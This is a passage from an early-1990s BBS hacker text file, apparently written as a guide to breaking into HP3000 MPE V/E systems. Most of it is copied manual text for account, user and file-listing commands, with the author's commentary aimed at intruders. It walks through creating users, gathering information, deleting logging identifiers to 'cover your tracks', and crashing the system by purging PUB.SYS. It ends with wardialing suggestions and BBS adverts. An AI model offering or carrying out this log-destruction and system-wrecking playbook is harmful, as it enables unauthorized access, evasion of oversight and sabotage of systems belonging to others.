specified if they are separated by commas. Both user types may be specified if they are separated by commas. subqueuename The name of the subqueue indicating the highest priority that can be requested by any process during any job or session in the account. This parameter is specified as AS, BS, CS, DS, or ES. localattribute The local attribute of the account, as defined at the installation site. This is a double-word bit map used to further classify accounts. When it is not part of standard MPE V/E security provisions, programmers may define local attributes (which are checked by the -WHO intrinsic) to enhance their software's security. The default is double-word 0 . volset The volume set or class reference which, when fully qualified, is in the form <vcsid.groupname.acctname>. <vcsid> refers to a previously defined volume set or class. SPAN Specifies that the <accountname> is to be inserted in the accounting directory of the specified volume set (volset). The specified volume set must already be physically mounted for the SPAN operation to succeed. The associated account manager and PUB group are not created in the accounting directory of the specified volume set. Once the account has been spanned to the volume set, it does not need to be spanned again on another system which shares the volume set under the same account name. The <volset> parameter is not necessary. REQ USERPASS=REQ specifies that all users in the account are to have non-blank passwords. If you require user passwords, MPE V/E assigns the account manager a blank, expired password. The account manager must select a new password the first time the Manager logs on. It is available only if the HP Security Monitor has been installed. OPT USERPASS=OPT specifies that users of the account may or may not have passwords. This is the default. It is available only if the HP Security Monitor has been installed. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. You must have system manager (SM) capability to execute this command. OPERATION The NEWACCT command may only be executed by the system manager. The system manager is responsible for establishing the accounting structure best suited to the computer installation. When a keyword is specified but its corresponding parameter is omitted (as in ;ACCESS= ), the default value for that keyword is assigned (in this case, R, L, A, W, X:AC). The default is also assigned when an entire keyword parameter group (such as ;ACCESS=fileaccess) is omitted. After the system manager has created accounts and their PUB groups, and has designated the account managers for those accounts, the new account managers may logon and redefine their own attributes and those of their PUB groups. Account managers may also define new users and groups. However, the capabilities and attributes the account managers assign to groups and users cannot exceed those assigned to the account itself by the system manager. For example, if the system manager does not assign the account DS capability, no users in the account are permitted DS capability (so they cannot use extra data segments). The PUB group is initially assigned no password and the same capability class attributes, permanent file space limit, CPU limit, and connect time limit as the account. Its initial security allows READ and EXECUTE access to all users who successfully logon to the account, and APPEND, WRITE, LOCK, and SAVE access to account librarian (AL) and group users (GU) only. These access provisions are (R,X:ANY;A,W,L,S:AL,GU). EXAMPLE To create an account with the account name ACI, and the account manager name MNGR, with all other parameters assigned by default, enter: NEWACCT ACI,MNGR ------------------------------------------------------------------------- The following will let you make a new user. NEWUSER: Defines a new user. SYNTAX NEWUSER name [;PASS=[password]] [;CAP=[capabilitylist]] [;MAXPRI=[subqueuename]] [;LOCATTR=[localattribute]] [;HOME=[homegroupname]] [;USERPASS={REQ}] [,EXPIRED]] (1) OPT} (1) The USERPASS parameter is available only if the HP Security Monitor has been installed. PARAMETERS username The name of the user. The name must consist of one to eight alphanumeric characters, beginning with an alphabetic character. accountname As system manager, you can include the account name when you are logged onto an account other than the requested account. password User password, used for verifying logon access only. The password must consist of one to eight alphanumeric characters, beginning with an alphabetic character. The default is that no password is assigned. capabilitylist List of capabilities, separated by commas, allowed this account. Each capability is denoted by a two- letter mnemonic, as follows: System Manager SM Account Manager AM Account Librarian AL Group Librarian GL Diagnostician DI System Supervisor OP Network Administrator NA Node Manager NM Permanent Files SF Access to non-sharable I/O devices ND Use Volumes UV Create Volumes CV Use Communications Subsystems CS User Logging LG Process Handling PH Extra Data Segments DS Multiple RINs MR Privileged Mode PM Interactive Access IA Local Batch Access BA Capabilities assigned to the user via the ;CAP= parameter cannot exceed those assigned to the account. If the account's capabilities are altered, any capabilities removed from the account are also removed from the user. The user's capabilities are always a subset of the account's at logon. This prevents a user from being granted a capability not assigned to the account. Note that CV capability, which allows users to create private volumes, also confers UV capability, which lets them use those volumes. The default is IA, BA, ND, SF. subqueuename The name of the highest priority subqueue that any job or session in the account can request for executing processes. The <subqueuename> may be either AS, BS, CS, DS, or ES. The default is CS. The priority specified for the user in NEWUSER cannot be greater than that specified for the account. The <subqueuename> defined for the user is checked against the <subqueuename> defined for the user's account at logon. The lower priority of the two is used as the maximum priority and restricts all processes of the job/session. Also, the priority requested by the user at logon is checked against the <subqueuename> defined for that user, and the lower of these two values is granted. localattribute The local attribute of the user, as defined at the installation site. This is a double-word bitmap of arbitrary meaning, which may be used to classify users further. Although it is not part of standard MPE V/E security provisions, it is available to processes through the WHO intrinsic for use in the programmer's own security provisions. The NEWUSER command checks the local attributes of the user with those of the account. The default is double-word 0 (null). homegroupname The name of an existing group to be assigned as the user's home group. If none is assigned, the user must specify a group when logging on. The default is that no home group is assigned. REQ USERPASS=REQ requires that the user have a non-blank password. It is available only if the HP Security Monitor has been installed. OPT USERPASS=OPT makes a user password optional. This is the default. It is available only if the HP Security Monitor has been installed. EXPIRED The password expires immediately. The user cannot logon without selecting a new password. It is available only if the HP Security Monitor has been installed. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. A user must have account manager (AM) capability to execute this command. OPERATION The account manager uses the NEWUSER command to define an account member. When the user is defined, the account manager may also assign the user a password and capabilities, and limit the user's access to system resources. Parameters defining these values may also be omitted from the command line; in this case, the defaults are assigned to the user. EXAMPLE To define a new user named LHSMITH and assign a password of SMITTY and a homegroup of HOMEGPX, enter: NEWUSER LHSMITH;PASS=SMITTY;HOME=HOMEGPX ------------------------------------------------------------------------- INFORMATION RETERVAL: Now that your in and have acsess to it all you will want to suck the system dry of it's information. The following section is devoted to just that. We will go into file retrieval, program runing, and log veiwing. The following lets you see the user defined programes to run one just type it's names at the prompt. SHOWCATALOG Lists user-defined command (UDC) files. SYNTAX SHOWCATALOG [listfile ] ;USER=user[.acct] PARAMETERS listfile An arbitrary filename, used to identify the UDC file when the output of SHOWCATALOG is sent to a printer. The output may be redirected with a previous FILE command. Default is that UDC files are displayed on your terminal (the $STDLIST device). user[.acct] A particular user whose UDC filenames will be displayed on the screen or sent to a listfile; the contents of the files are not displayed. The wildcard characters @, #, and ? may be used in [.acct] as you would use them in the specification of any user or any account, where: @ One or more alphanumeric characters. Used by itself, @ denotes "all members of the set". # One numeric character. ? One alphanumeric character. Each wildcard character counts toward the eight character limit for <user> or <acct>. USE This command may be issued from a session, job, or in BREAK. It may not be issued from a program. It is breakable (aborts execution). OPERATION The SHOWCATALOG command lists user-defined command (UDC) files. Unless the output is redirected to another device with the FILE command, as shown in "EXAMPLE", the listing appears on your terminal. It indicates at which level (user, account, or system) the files have been defined, so that you may display the current catalog before adding or deleting system level UDCs (if you are the system manager) or account level UDCs (if you are account manager). EXAMPLE To list system, account, and user level UDC files on your terminal, enter: SHOWCATALOG To store the current UDC file on disk as "LFILE" (which may also be printed) enter: BUILD LFILE FILE LFILE,OLD;DEV=DISC SHOWCATALOG *LFILE -------------------------------------------------------------------- The next two comands are self explanotory and easy to use but they are the back of info gathering so I will explan them. LISTF Lists descriptions of one or more permanent disk files. SYNTAX {, 0} {, 1} LISTF [fileset][{, 2}] [;listfile] ,-1} ,-2} PARAMETERS fileset Specifies the set of files to be listed. This positional parameter has the form: filename[.groupname[.acctname]] The characters @, #, and ? can be used as wildcard characters in any position of the <fileset> parameter. The wildcard characters count toward the eight-character limit for group, account, and file names. These wildcard characters have the following meanings: @ Specifies one or more alphanumeric characters.When used by itself, @ denotes all members of the set. # Specifies one numeric character. ? Specifies one alphanumeric character. These characters can be used with files as follows: n@ Lists all files starting with the character "n". @n Lists all files ending with the character "n". n@x Lists all files starting with the character "n" and ending with the character "x". n####### Lists all files starting with the character "n" followed by seven digits. ?n@ Lists all files whose second character is "n". n? Represents all two-character files starting with the character "n". ?n Represents all two-character files ending with the character "n". Depending on the position of these characters in the <fileset> parameter, they can also be used to indicate groups and accounts. If you do not specify a group or account, MPE V/E assumes the logon group and account. The default is @ (lists all files in logon group). 0, 1, 2, -1, or -2 Displays information about the file. Displays only the file name. The default is 0 if no list level is specified. 0 Displays only the file name. The default is 0 if no list level is specified. 1 Displays the file name, file code, record size, format, the current end-of-file location, and the maximum number of records allowed in the file. It also shows whether the file is ASCII or binary; CCTL or NOCCTL; CIR, MSG, or STD. An asterisk following the file name indicates that someone has performed an FOPEN on it and not yet done an FCLOSE. 2 Displays all the information found with option 1, plus the blocking factor, the number of disk sectors in use (including those in use for system and user labels), the number of extents currently allocated, and the maximum number of extents allowed. -1 Displays the octal listing of the file label. The first line of this listing is the directory entry for the file being listed. The remainder is the file label. The -1 option is available only to users who have system manager (SM) or account manager (AM) capability. -2 Displays the access control definition (ACD) information associated with the requested <fileset>. If no ACD information exists for a file or if you do not have access to the ACD (SM, AM, CR, or RACD access), a message stating that fact is issued. listfile The name of the output file to which the descriptions are written. It is automatically specified as an ASCII file with variable length records and these characteristics: closed in the temporary domain, CCTL, OUT access mode, and EXC (exclusive access) option. The remaining characteristics are those obtained from the FILE command default specifications. This file is temporary and cannot be overwritten by a BUILD command. The default is $STDLIST. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] suspends execution. OPERATION This command applies only to permanent disk files. It lists descriptions of one or more disk files at the level of detail you select. You need not have access to a file to list a description of it, but you must have access to it to receive information on any associated ACDs. However, a file description is not listed unless the file's home volume set (PV) is mounted. A standard user may list level 0, 1, and 2 information for any file in the system, or - 2 ACD data for those files for which they have READ ACD access. Users with AM capability may list level -1 or -2 data for files in their own accounts. Users with SM capability may list -1 or -2 data for any file in the system. If you send a LISTF command to the line printer or magnetic tape, the date and time are printed at the top of the data. You may request that the file information be displayed on devices other than the standard listing device. Name the desired device in the FILE command as follows: FILE PRTR;DEV=LP ** Equates name PRTR with device class name LP. ** LISTF @.@,2;*PRTR ** Directs level 2 description of all files in all groups of the logon account to PRTR. ** If MPE V/E fails to locate a requested file, the following error message is displayed. NON-EXISTENT FILE (CIERR 907) If you have a wildcard character in your request and MPE V/E cannot locate any files satisfying those conditions, the following warning is displayed: NO FILES FOUND IN FILE-SET (CIWARN 431) EXAMPLE The following examples illustrate several uses of the LISTF command. Level 0 (Default) Output Format LISTF FILENAME APPB APPC APPD APPE APPF CONMSG CONOP1 CONOP4 CONOP5 CONOPEX CONSG EXAMPLES GIMAGE GIMCOM GIMDOC GIMDS GIMPO INDEX K10130955 LINDA LIST LOGON MEMO MTS MTS3000 OPFRONT PS REPLY SCHED VIP Level 1 Output Format LISTF,1 ACCOUNT= LEWIS GROUP= PUB FILENAME CODE -------------LOGICAL RECORD----------- SIZE TYP EOF LIMIT CONOP1 80B FA 10 10 K0880909 TDPQ 104B FA 636 2269 BOXES DRAW 128W FB 84 84 EXAMPLES 80B FA 20 20 ERRORLOG 80B FAO 12 1024 Level 2 Output Format LISTF,2 ACCOUNT= USERS GROUP= BARBARA FILENAME CODE -------------LOGICAL RECORD---------------SPACE---- SIZE TYP EOF LIMIT R/B SECTORS #X APPB 88B FA 414 414 16 162 14 14 APPM 80B VAM 119 240 16 12 8 8 APPC 80B FAO 127 208 16 70 8 8 APPK KSAM 80B FA 16 200 16 20 2 7 The column headings have the following meanings: FILENAME Gives the filename. An asterisk (*) following the filename in options 1 and 2 indicates the file is open for READ or WRITE access. CODE Refer to the BUILD or FILE command for an explanation of the file code. SIZE The size of the records under the heading SIZE, indicating the number of words (W) or bytes (B). TYP The first letter under this heading contains information on the record format. This is listed in one of the following ways: F (fixed length), V (variable length), or U (undefined length). The second letter indicates whether the file is A (ASCII) or B (binary). The third letter indicates the kind of file. This information appears in one of the following ways: Blank (standard file unless KSAM appears in the code field), O (circular file), M (message file), or R (relative I/O file). The letter C follows if the file has the ;CCTL attribute. EOF End of file location. LIMIT Maximum number of records allowed. R/B Blocking factor. SECTORS Sectors in use. #X Extents allocated. MX Maximum number of extents allowed. Level -1 Output Format LISTF UDCS, -1 F = UDCS 052504 041523 020040 020040 001001 120353 UDCS........ 052504 041523 020040 020040 041517 046504 020040 020040 UDCS....COMD.... 045440 020040 020040 020040 046501 051111 051523 040440 K..........TECH. 020040 020040 020040 020040 020202 004040 000001 123525 ...............U 123525 123525 000000 000000 000014 000000 000000 002163 .U.U...........s 000000 000000 120173 021427 000005 177650 002374 005015 ................ 000024 000036 000000 002163 001001 120353 000400 104644 .......s........ 001401 032743 001001 162503 001401 036363 001401 041324 ..5....C......B. 001001 164214 001401 042166 001002 001740 001401 044134 ......Dv......H. 001002 002656 001401 045323 001002 006740 000400 150014 ......J......... 000000 000000 000000 000000 000000 000000 000000 000000 ................ 000000 000000 000000 000000 000000 000000 000000 000000 ................ 000000 000000 000000 000000 000000 000000 000000 000000 ................ 000000 000000 000000 000000 000000 000000 000000 000000 ................ 000000 000000 000000 000000 004072 034411 123525 000000 ..........9..U.. 000000 000000 000000 000000 000000 000000 004073 002010 ................ 000000 000000 000000 000000 042111 051503 020001 000001 ........DISC.... A pictorial explanation of the level −1 output, follows: LISTF <filename>, -1 Level -2 Output Format LISTF, -2 ACCOUNT= TEST GROUP= STGAMES FILENAME -------------ACD ENTRIES--------------- APPE JOE.DOE : R @.OSE : R,W,A,L,X @.@ : X NOACCESS NO ACD ACCESS NONE NO ACDS The disk file label contains the following: Words Content 0-3 Local filename 4-7 Group name 8-11 Account name 12-15 Identity for file creator 16-19 File lockword 20-21 File security matrix 22 (Bits 0:7) Reserved for NLS (Bits 8:13) Not used (Bits 14:1) STORE/RESTORE release bit (Bits 15:1) File secure bit: If 1, file secured If 0, file released 23 File creation date* 24 Last access date* 25 Last modification date* 26 File code 27 Private volume information (Bits 0:1) Class flag bit (Bits 1:3) Not used (Bits 4:4) Mounted volume table index (Bits 8:8) Volume mask 28 (Bit 0:1) STORE bit (If on, STORE or RESTORE, in progress) (Bit 1:1) RESTORE bit (If on, RESTORE in progress) (Bit 2:1) Load bit (If on, program file is loaded) (Bit 3:1) EXCLUSIVE bit (If on, file is opened with EXCLUSIVE access) (Bits 4:4) Device subtype (Bits 8:6) Device type (Bits 14:1) File is open for WRITE (Bits 15:1) File is open for READ 29 (Bits 0:8) Number of user labels written (Bits 8:8) Number of user labels 30-31 Maximum number of logical records 32-33 File control block vector 34 Checksum 35 Coldload identity 36 Foptions specifications 37 Logical record size (in negative bytes) 38 Block size (in words) 39 (Bits 0:8) Sector offset to data (Bits 8:3) Not used (Bits 11:5) Number of extents minus 1 40 Logical size of last extent size in sectors 41 Extent size 42-43 Number of logical records in file 44-107 Two-word addresses of up to 32 disk extents, beginning with address of first extents (words 44-45) 108-109 File allocation time 110 File allocation date 111 Not used 112-113 Start of file block number 114-115 Block number of last block 116-117 Number of open and closed records 124-127 Device class Dates are in the same format as the value returned from the CALENDAR intrinsic: Bits 0 6 7 15 Year of Century Day of Year GENERAL EXAMPLES To list all of the files in your logon group that have X as the second alphabetic character in their names, enter: LISTF ?X@ FILES FOR JASON.MANU,PEN EXAMP : To list all of the three-character files in your logon group and account that end in the letter N, enter: LISTF ??N FILES FOR JASON.MANU,PEN SYN LISTFTEMP Lists the descriptions of one or more temporary disk files for a job or session. SYNTAX LISTFTEMP [fileset][,listlevel][;listfile] PARAMETERS fileset Specifies the set of files to be listed. This positional parameter takes the following form: filename[.groupname[.acctname]] The characters @, #, and ? may be used as wildcard characters in any position of the <fileset> parameter. The wildcard characters count toward the eight-character limit for group, account, and filenames. These wildcard characters have the following meanings: @ Specifies zero or more alphanumeric characters. When used by itself, @ denotes all members of the set. # Specifies one numeric character. ? Specifies one alphanumeric character. These characters can be used with files as follows: n@ Lists all files starting with the character "n". @n Lists all files ending with the character "n". n@x Lists all files starting with the character "n" and ending with the character "x". n####### Lists all files starting with the character "n" followed by seven digits. ?n@ Lists all files whose second character is "n". n? Represents all two-character files that start with the character "n". ?n Represents all two-character files that end with the character "n". Depending on their placement in the <fileset> parameter, these characters may also be used to indicate groups and accounts. If you specify nothing for the group or account, MPE V/E assumes the logon group and account. The default is @ (all files in logon group). listlevel Displays information about the file. The options are level 0, 1, 2, or -1: 0 Displays only the filename. The default is 0 if no listlevel is specified. 1 Displays the filename, file code, record size, format, the current end-of-file location, and the maximum number of records allowed in the file. (It also shows whether the file is ASCII or binary; CCTL or NOCCTL; CIR, MSG, or STD). 2 Displays all of the information found with the 1 option, plus the blocking factor, the number of disk sectors in use (including those in use for file labels and user headers), the number of extents currently allocated, and the maximum number of extents allowed. -1 Displays the octal listing of the file label. The first line of this listing is the directory entry for the file being listed. The -1 option is available only to users who have SM or AM capability. listfile The name of the output file to which the descriptions are written. It is automatically specified as an ASCII file with variable length records and these characteristics: closed in the temporary domain, CCTL (user supplied carriage- control characters), OUT access mode, and EXC (exclusive access) option. The remainder of its characteristics are those obtained from the FILE command default specifications. This file is temporary and cannot be overwritten by a BUILD command. The default is $STDLIST. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. OPERATION This command lists descriptions of one or more temporary disk files at the level of detail you select. A file description is not listed unless the file's home volume set (PV) is mounted. A standard user may specify level 0, 1 and 2 information for any file in the system. A user with account manager or system manager capability may list level -1 data for files in his or her own account. When you send LISTFTEMP data to the line printer or magnetic tape, the date and time appear at the beginning of the listing. LISTFTEMP displays the system file $OLDPASS only if wildcard characters are used in the file specification and if $OLDPASS fits the specification. You may have the file information displayed on a device other than your standard list device. To do so, name the desired device in the FILE command, then backreference the formal file name on the LISTFTEMP command line. In the following example, the filename PRTR is equated with the device class LP. Then, a level 2 description of all files in all groups of the logon account is sent to PRTR. FILE PRTR;DEV=LP LISTFTEMP @.@,2;*PRTR If MPE V/E fails to locate the file you request, one of the following error messages is displayed: TEMPORARY FILE NOT FOUND (CIWARN 3289) NO TEMP FILES EXIST (CIWARN 3284) If you use a wildcard character in your request and MPE V/E cannot locate any files satisfying those conditions, the following warning is displayed: TEMPORARY FILE NOT FOUND (CIWARN 3289) LISTFTEMP requires 8K of stack space to execute. If you use the command programmatically, make the appropriate <maxdata> allowances for your application. EXAMPLE The following examples illustrate several uses of the LISTFTEMP command. Level 0 (Default) Output Format LISTFTEMP @.@.@ TEMPORARY FILES FOR JASON.MANU,PEN $OLDPASS.PEN.MANU AJ.PEN.MANU AJJ.PEN.MANU Z10Z414A.JON.MANU TEMPFILE.TEMPGROUP.SYS. Level 1 Output Format LISTFTEMP B@,1 TEMPORARY FILES FOR JASON.MANU,PEN ACCOUNT= MANU GROUP= PEN FILENAME CODE -------------LOGICAL RECORD----------- SIZE TYP EOF LIMIT BONOP1 80B FA 10 10 BOTE TDPQ 104B FA 636 2269 (TEMP) BOXES DRAW 128W FB 84 84 (TEMP) BRAMPLES* 80B FA 20 20 (TEMP) BRRORLOG 80B FAO 12 1024 (TEMP) Level 2 Output Format LISTFTEMP A@,2 TEMPORARY FILES FOR JASON.MANU,PEN ACCOUNT= MANU GROUP= PEN FILENAME CODE -------------LOGICAL RECORD----------- ----SPACE-- SIZE TYP EOF LIMIT R/B SECTORS #X MX APPB 88B FA 414 414 16 162 14 14 (TEMP) APPM 80B VAM 119 240 16 12 8 8 (TEMP) APPC 80B FAO 127 208 16 70 8 8 (TEMP) APPK KSAM80B FA 16 200 16 20 2 7 (TEMP) The column headings have the following meanings: HEADING MEANING FILENAME Displays the filename. An asterisk (*) following the filename in the level 1 and 2 options indicates the file is open for READ or WRITE access. CODE Indicates a special file format. Refer to the BUILD or FILE command for a list of file codes and their meaning. SIZE Displays the size of the records under the heading SIZE, indicating the number of words (W) or bytes (B). TYP The first column under this heading contains information concerning record format. This is listed in one of the following ways: F (fixed length), V (variable length), or U (undefined length). The second column indicates whether the file is A (ASCII) or B (binary). The third column indicates the kind of file. This information appears in one of the following ways: Blank (standard file unless KSAM appears in the code field), O (circular file), D (message file) or R (relative I/O file). In the fourth column a C appears only if the ;CCTL parameter is selected. EOF End of file location. LIMIT Maximum number of records allowed. R/B Blocking factor. SECTORS Sectors in use. #X Extents allocated. MX Maximum number of extents allowed. (TEMP) Temporary files. Level -1 Output Format LISTFTEMP UDCS, -1 F = UDCS (TEMPORARY FILES) 052504 041523 020040 020040 001001 120353 UDCS........ 052504 041523 020040 020040 041517 046504 020040 020040 UDCS....COMD.... 045440 020040 020040 020040 046501 051111 051523 040440 K..........TECH. 020040 020040 020040 020040 020202 004040 000001 123525 ...............U 123525 123525 000000 000000 000014 000000 000000 002163 .U.U...........s 000000 000000 120173 021427 000005 177650 002374 005015 ................ 000024 000036 000000 002163 001001 120353 000400 104644 .......s........ 001401 032743 001001 162503 001401 036363 001401 041324 ..5....C......B. 001001 164214 001401 042166 001002 001740 001401 044134 ......Dv......H. 001002 002656 001401 045323 001002 006740 000400 150014 ......J......... 000000 000000 000000 000000 000000 000000 000000 000000 ................ 000000 000000 000000 000000 000000 000000 000000 000000 ................ 000000 000000 000000 000000 000000 000000 000000 000000 ................ 000000 000000 000000 000000 000000 000000 000000 000000 ................ 000000 000000 000000 000000 004072 034411 123525 000000 ..........9..U.. 000000 000000 000000 000000 000000 000000 004073 002010 ................ 000000 000000 000000 000000 042111 051503 020001 000001 ........DISC.... A pictorial explanation of the level -1 output, follows: LISTFTEMP <filename>, -1 The disk file label contains the following: Words Content 0-3 Local filename 4-7 Group name 8-11 Account name 12-15 Identity of file creator 16-19 File lockword 20-21 File security matrix 22 (Bits 0:7) Reserved for NLS (Bits 8:13) Not used (Bits 14:1) STORE/RESTORE release bit (Bits 15:1) File secure bit: If 1, file secured If 0, file released 23 File creation date* 24 Last access date* 25 Last modification date* 26 File code 27 Private volume information (Bits 0:1) Class flag bit (Bits 1:3) Not used (Bits 4:4) Mounted volume table index (Bits 8:8) Volume mask 28 (Bit 0:1) STORE Bit (If on, STORE or RESTORE in progress) (Bit 1:1) RESTORE Bit (If on, RESTORE in progress) (Bit 2:1) Load Bit (If on, program file is loaded) (Bit 3:1) EXCLUSIVE Bit (If on, file is opened with EXCLUSIVE access) (Bits 4:4) Device subtype (Bits 8:6) Device type (Bits 14:1) File is open for WRITE (Bits 15:1) File is open for READ 29 (Bits 0:8) Number of user labels written (Bits 8:8) Number of user labels 30-31 Maximum number of logical records 32-33 File control block vector 34 Checksum 35 Coldload identity 36 Foptions specifications 37 Logical record size (in negative bytes) 38 Block size (in words) 39 (Bits 0:8) Sector offset to data (Bits 8:3) Not used (Bits 11:5) Number of extents minus 1 40 Logical size of last extent size in sectors 41 Extent size 42-43 Number of logical records in file 44-107 Two-word addresses of up to 32 disk extents, beginning with address of first extents (words 44-45) 108-109 File allocation time 110 File allocation date 111 Not used 112-113 Start of file block number 114-115 Block number of last block 116-117 Number of open and closed records 124-127 Device class Dates are in the same format as the value returned from the CALENDAR intrinsic: Bits 0 6 7 15 Year of Century Day of Year GENERAL EXAMPLES To list all of the files in your logon group that have X as the second alphabetic character in their names, enter: LISTFTEMP ?X@ TEMPORARY FILES FOR JASON.MANU,PEN EXAMP To list all of the three-character files in your logon group and account that end in the letter N, enter: LISTFTEMP N TEMPORARY FILES FOR JASON.MANU,PEN SYN ------------------------------------------------------------------------- LOG DESTRUCTION The good hack never wants to leave a trail behind him so after the fun be sure to cover your tracks and kill the log. Warning this will insome cases save your ass but it will definitly tip the operator of so do it on your last call! Your first job is to find the log files, this can be done with the next command. LISTLOG Lists currently active logging identifiers on the system and whether log file changing has been enabled. SYNTAX LISTLOG [logid[;PASS]] PARAMETERS logid The specific logging identifier to be verified. The default is to list all currently active logging identifiers on the system. PASS Causes the password associated with the logging identifier to be displayed. The password can be used only by the creator of the logging identifier. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. You must have user logging (LG) capability to execute this command. OPERATION This command lists the logging identifier specified with its associated creator and log file. The column labeled CHANGE indicates whether the CHANGELOG command is permitted: that is, whether the name of the first logging file ends in "001" and thus follows the naming convention required by the CHANGELOG command. The column labeled AUTO indicates whether an automatic CHANGELOG is permitted: that is, whether the AUTO parameter has been specified with a GETLOG or ALTLOG command. If the <logid> parameter is not entered, all logging identifiers on the system are displayed with their creators and log files. The PASS parameter, which can be used only by the creator of the logging identifier specified, causes the password associated with the logging identifier to be listed. You must have system supervisor (OP) or user logging (LG) capability in order to use this command. EXAMPLE To list all logging identifiers on the system, enter: LISTLOG LOGID CREATOR CHANGE AUTO CURRENT LOGFILE TESTLOG LALITHA.MPEM YES YES LAL001.PEJAVAR.MPEM TEST1 MARK.MPEM YES NO M001.KSAM3000.MPEM TEST2 PAT.MPEM NO NO TEST.ALVAREZ.MPEM ---------------------------------------------------------------------- Now that you have the list of logs to ZAP use the following and presto! RELLOG SYNTAX RELLOG logid PARAMETERS logid The logging identifier to be removed from the system. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. You must have system supervisor (OP) or user logging (LG) capability in order to use this command. OPERATION The RELLOG command removes a logging identifier from the system by deleting it from the directory of logging identifiers. This command may be issued only by the user who created the logging identifier specified in the <logid> parameter. After RELLOG is issued, programs containing the removed logging identifier may not access the logging system. EXAMPLE To remove the logging identifier DATALOG from the system, enter: RELLOG DATALOG ------------------------------------------------------------------------ CRASHING THE SUCKER I NEVER adbocate the following but I realize that there is those times when being able to crash a system will save your ass. The hp3000 is very vulnerable to attack and there is many ways to crash one but the following is easy and IT WORKS! All you have to do is purge the PUB group of the SYS account. The public group of the system account, PUB.SYS, cannot be completely purged. If you specify this group in the <groupname> parameter, all non-system and inactive files are purged. This seriously impairs the functioning of the entire system. PURGEGROUP groupname[.accountname] [;VS=volset] PARAMETERS groupname Name of the group in the logon account to be removed. This name must contain from one to eight alphanumeric characters, beginning with an alphabetic character. accountname As system manager, you can include the account name when you are logged onto an account other than the requested account. volset Volume set or volume class reference which, when fully qualified, is in the form, <vcsid.groupname.acctname>. <vcsid> refers to a previously defined volume set or volume class. If <volset> is specified, the volume set or volume class must be mounted or the PURGEGROUP command will fail. When the <volset> parameter is specified, the group is removed from the volume set directory, and not the system directory. USE You may issue this command from a session, job, program, or in BREAK. Pressing [BREAK] has no effect on this command. You must have account manager (AM) capability to execute this command. OPERATION Account managers use the PURGEGROUP command to delete a group from their account. When the command is executed during a session, MPE V/E displays a verification request. Respond with "YES" or "NO" to the message: GROUP <groupname> TO BE PURGED? (YES/NO) No verification message is printed if the PURGEGROUP command is entered in a job. If the group resides on a private volume, the command is executed only when the group's home volume set is mounted. The order in which entries are purged is: volume set definitions, files, and finally the group. If no files in the group are in use, and the group itself is not in use, the PURGEGROUP command removes the entire group. Otherwise, only inactive files are removed. To completely purge the group in this case, re-enter the PURGEGROUP command when neither the group nor its files are in use. EXAMPLE To purge a group named GROUP1, enter: PURGEGROUP GROUP1 GROUP GROUP1 TO BE PURGED? (YES/NO) YES ------------------------------------------------------------------------ LOG OFF: Simple just type BYE and in the words of ucbbs "click your gone." It will display the cpu time, total time, node number you where on and thats all folks. -------------------------------------------------------------------- Well if you made it this far you are half way to being the radist hp3000 hacker in the world.... The other half is to get a system to use. Some suggestions pick up a copy of LOD tech journal 3 it has a telenet scan with lots of HP's and also if you wardial a prefix, I don't care if it is nowheresvile Kansus you will find a HP3000. ------------------------------------------------------------------ Greets go out to Destolation,G$, Bounty Hunter, Tallman, Cerribum, Electron, Effendi, the rest of the Ministry OF Fear. A A A A A A A A A A A AAAAAAAAAAAAAAAAAA A A A A A A A A XIS `91 CALL THESE GREAT BOARDS APOCALYPSE NOW (206) 838-6435 AXIS HQ GOBAL GENOCIDE (705) 742-8436 MOF HQ VOID OF REALITY (312) 586-0162 -------------------------------------------------------------------------- THIS TEXTFILE PASSED THROU... +:+:+: /X\ETAL CHURCH :+:+:+ AUSTRIA's OLDEST BBS L E P R O S Y - W H Q ~~~~~~~~~~~~~~~~~~~~~~~~~ [2400-38400 BAUD!] [OVER 14.000 CALLS!] - [OVER 340 USERS!] [H/P/A-CONFERENCE!] LINE #1: +43-725-266-402 LINE #2: +43-725-268-655 ~~~~~~~ ~~~~~~~ CALL NOW AND GET FULL ACCESS AT THE FIRST MINUTE YOU LOG IN !!! -------------------------------------------------------------------------- +--------------------------------------------------+ | This file was leeched from TEMPLE OF DESTRUCTION | | ~~~~~~~~~~~~~~~~~~~~~ | | [+39]-2-2827442 14.4k Dual Hst Amiga & PC | | | | [+39]-2-26142278 14.4k Dual Hst D I V I N A Ehq | | ~ ~ ~ ~ ~ ~ | +--------------------------------------------------+ CET upload Time: Wednesday 15-Jan-92 01:51:59